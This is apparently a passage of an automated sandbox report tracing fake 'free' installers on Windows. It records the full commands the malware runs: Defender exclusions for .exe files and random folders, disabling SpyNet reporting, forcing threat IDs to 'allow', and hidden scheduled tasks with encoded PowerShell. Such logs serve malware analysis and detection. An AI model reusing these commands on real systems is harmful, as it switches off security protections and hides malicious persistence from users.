- Executes dropped EXE
PID:208 -
C:\Users\Admin\AppData\Local\Temp\7zS5E91.tmp\Install.exe.\Install.exe /S /site_id "757674" /S /site_id=7576746⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:524 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵PID:2748
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵PID:4440
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵PID:4540
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵
- Loads dropped DLL
PID:1512
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵PID:4736
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵PID:2624
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵PID:884
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵PID:3960
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHlDNxXeG" /SC once /ST 08:21:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
PID:4368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHlDNxXeG"7⤵PID:4660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHlDNxXeG"7⤵PID:968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bQVIyCuucUjqxTYLAY" /SC once /ST 16:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa\xiEkNlOfzcWZMyi\hSziFol.exe\" 3T /site_id 757674 /S" /V1 /F7⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4608
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 17084⤵
- Program crash
PID:5092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 19524⤵
- Program crash
PID:4428
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18124⤵
- Program crash
PID:372
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 17764⤵
- Program crash
PID:3980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 20284⤵
- Program crash
PID:1808
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 19444⤵
- Program crash
PID:3728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 19484⤵
- Program crash
PID:2232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 17884⤵
- Program crash
PID:4060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18284⤵
- Program crash
PID:224
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 7924⤵
- Program crash
PID:4564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 19444⤵
- Program crash
PID:4548
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 20244⤵
- Program crash
PID:224
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18604⤵
- Program crash
PID:784
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 18124⤵
- Program crash
PID:4220
-
-
-
-
C:\Users\Admin\Documents\w1free.rar_id20808554.exe"C:\Users\Admin\Documents\w1free.rar_id20808554.exe"1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4276
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5092 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:904
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3824
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:2600
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2240
-
C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"1⤵PID:3644
-
C:\Users\Admin\AppData\Local\Temp\is-FNNEC.tmp\is-L3J6H.tmp"C:\Users\Admin\AppData\Local\Temp\is-FNNEC.tmp\is-L3J6H.tmp" /SL4 $502B8 "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 522242⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:4964 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query3⤵PID:2224
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"3⤵
- Executes dropped EXE
PID:2832 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 8524⤵
- Program crash
PID:4544
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 8644⤵
- Program crash
PID:3088
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 2564⤵
- Program crash
PID:2204
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "CloneRemover 3.9"3⤵PID:1032
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe" c322aa8acb58a24b92f7268bee04d5363⤵
- Executes dropped EXE
PID:3172 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 6724⤵
- Program crash
PID:1980
-
-
-
-
C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"1⤵PID:2436
-
C:\Users\Admin\AppData\Local\Temp\is-DQEUK.tmp\is-OI5G3.tmp"C:\Users\Admin\AppData\Local\Temp\is-DQEUK.tmp\is-OI5G3.tmp" /SL4 $60276 "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 522242⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:1668 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query3⤵PID:1640
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"3⤵
- Executes dropped EXE
PID:160 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 160 -s 7684⤵
- Program crash
PID:4560
-
-
-
-
C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"1⤵PID:4680
-
C:\Users\Admin\AppData\Local\Temp\is-Q3P1T.tmp\is-VHAAD.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q3P1T.tmp\is-VHAAD.tmp" /SL4 $8036A "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 522242⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:3272 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query3⤵PID:2564
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"3⤵
- Executes dropped EXE
PID:880 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 8524⤵
- Program crash
PID:3068
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 8644⤵
- Program crash
PID:4500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 2284⤵
- Program crash
PID:3004
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "CloneRemover 3.9"3⤵PID:1848
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe" c322aa8acb58a24b92f7268bee04d5363⤵
- Executes dropped EXE
PID:64 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 64 -s 2404⤵
- Program crash
PID:4204
-
-
-
-
C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"1⤵PID:3836
-
C:\Users\Admin\AppData\Local\Temp\is-8JUDL.tmp\is-CLNR1.tmp"C:\Users\Admin\AppData\Local\Temp\is-8JUDL.tmp\is-CLNR1.tmp" /SL4 $70374 "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 522242⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:4564 -
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"3⤵
- Executes dropped EXE
PID:3816
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query3⤵PID:2064
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe" c322aa8acb58a24b92f7268bee04d5363⤵
- Executes dropped EXE
PID:3560 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3560 -s 6804⤵
- Program crash
PID:3296
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "CloneRemover 3.9"3⤵PID:4768
-
-
-
C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"1⤵PID:3556
-
C:\Users\Admin\AppData\Local\Temp\is-4H2SM.tmp\is-2VSFS.tmp"C:\Users\Admin\AppData\Local\Temp\is-4H2SM.tmp\is-2VSFS.tmp" /SL4 $6027A "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 522242⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:4456 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query3⤵PID:1892
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"3⤵
- Executes dropped EXE
PID:1560 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 7684⤵
- Program crash
PID:4272
-
-
-
-
C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"1⤵PID:4780
-
C:\Users\Admin\AppData\Local\Temp\is-86C5N.tmp\is-T5169.tmp"C:\Users\Admin\AppData\Local\Temp\is-86C5N.tmp\is-T5169.tmp" /SL4 $3013C "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 522242⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:1472 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query3⤵PID:3728
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"3⤵
- Executes dropped EXE
PID:4852
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "CloneRemover 3.9"3⤵PID:3344
-
-
C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe" c322aa8acb58a24b92f7268bee04d5363⤵
- Executes dropped EXE
PID:1572
-
-
-
C:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa\xiEkNlOfzcWZMyi\hSziFol.exeC:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa\xiEkNlOfzcWZMyi\hSziFol.exe 3T /site_id 757674 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4608 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:4568
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:1424
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:2628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:1092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4668
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RFoKlzoQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RFoKlzoQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SEHcMRqOySkqPjodpTR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SEHcMRqOySkqPjodpTR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aIsgkipqYqjkC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aIsgkipqYqjkC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iQQhDFQnTDUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iQQhDFQnTDUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jxVmDfoFnnvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jxVmDfoFnnvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\MMuRMqsaIxxaqhVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\MMuRMqsaIxxaqhVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZuCHwPloRhxnZBJU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZuCHwPloRhxnZBJU\" 